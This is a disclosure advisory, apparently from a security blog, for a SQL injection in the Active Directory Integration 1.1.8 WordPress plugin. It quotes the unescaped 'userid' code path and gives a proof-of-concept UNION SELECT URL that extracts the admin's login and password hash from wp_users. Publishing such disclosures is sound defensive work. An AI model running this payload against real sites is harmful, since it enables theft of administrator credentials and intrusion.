Active Directory Integration 1.1.8 – WordPress Plugin – Sql Injection

Homepage:

https://wordpress.org/plugins/active-directory-integration/

Description:

  • Type user acces: administrator user.
  • Target need have configured ldap and active.

$_GET[‘userid’] is not escaped.

File / Code:

Path Request: /wp-content/plugins/active-directory-integration/syncback.php

Line :  135

$result = $ADI->bulksyncback( $_GET['userid'] );

Path Method: /wp-content/plugins/active-directory-integration/BulkSyncBackADIntegrationPlugin.class.php

Line: 142

// They must have a wp_usermeta.metakey = 'adi_samaccount' with a not empty meta_value and User 1 (admin) is excluded.// They must have a wp_usermeta.metakey = 'adi_samaccount' with a not empty meta_value and User 1 (admin) is excluded.
... else {
      $users = $wpdb->get_results("SELECT user_id FROM $wpdb->usermeta WHERE meta_key = 'adi_samaccountname' AND meta_value <> '' AND user_id <> 1 AND user_id = $userid");
 }

Proof of Concept:

1 – Log in with administrator user.

target.dev/wp-content/plugins/active-directory-integration/syncback.php?userid=1+UNION+SELECT+CONCAT(user_login,char(58),user_pass)+FROM+wp_users+WHERE+ID=1

2 – Result:

 

Timeline:

  • 07/09/2017 – Discovered
  • 11/09/2017 – Vendor finded
  • 03/11/2017 – Publish

Leave a Reply

Your email address will not be published. Required fields are marked *

Back to Top